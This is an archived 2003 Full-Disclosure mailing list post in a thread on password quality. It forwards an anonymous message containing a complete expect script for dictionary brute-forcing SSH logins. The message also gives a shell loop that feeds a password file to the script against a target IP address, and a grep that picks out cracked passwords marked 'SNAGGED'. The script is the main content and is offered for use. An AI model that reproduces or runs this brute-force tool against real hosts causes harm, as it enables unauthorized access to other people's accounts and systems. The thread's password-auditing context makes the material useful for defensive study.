[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Password quality?

To: <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] Password quality?
From: "Larry W. Cashdollar" <lwc@vapid.ath.cx>
Date: Wed, 10 Dec 2003 10:05:16 -0500 (EST)

I have been asked to forward this to the list anonymously.

---------- Forwarded message ----------
Date: Wed, 10 Dec 2003 09:34:31 -0500 (EST)
To: Larry W. Cashdollar <lwc@vapid.ath.cx>
Cc: "[X-UNKNOWN] Kristian Köhntopp" <kris@koehntopp.de>
Subject: Re: [Full-Disclosure] Password quality?

Hey guys,
If you want to try the "expect" route, you can use the script below...
but, yes, it is slow...would be much quicker if someone modified a
ssh-client in C ... ;-)

---cut

#!/usr/bin/expect -f


# by anonymous
# dorky way to brute force ssh passwd
# from command prompt do a
# for i in `cat PASSWD_FILE`; do ./ssh_brute.expect $i IPADDRESS >>
# ssh_rezults; done
# where PASSWD_FILE is your dictionary file and IPADDRESS is (duh) the IP
# address
# then run
# grep "SNAGGED" ssh_rezults


set timeout 5

set passwd [lindex $argv 0]
set host   [lindex $argv 1]

spawn ssh $host

expect "password:"
send -- "$passwd\n"


expect {

"assword"    { exit 0 }
"enied"       { exit 0 }
"#"           { send_user "SNAGGED $passwd\n" }
timeout          { exit 254 }
eof              { exit 253 }

}

exit 0


---cut



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Password quality?
  - From: Kristian Köhntopp <kris@koehntopp.de>

Prev by Date: Re: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
Next by Date: Re: [Full-Disclosure] Password quality?
Previous by thread: Re: [Full-Disclosure] Password quality?
Next by thread: Re: [Full-Disclosure] Password quality?
Index(es):
- Date
- Thread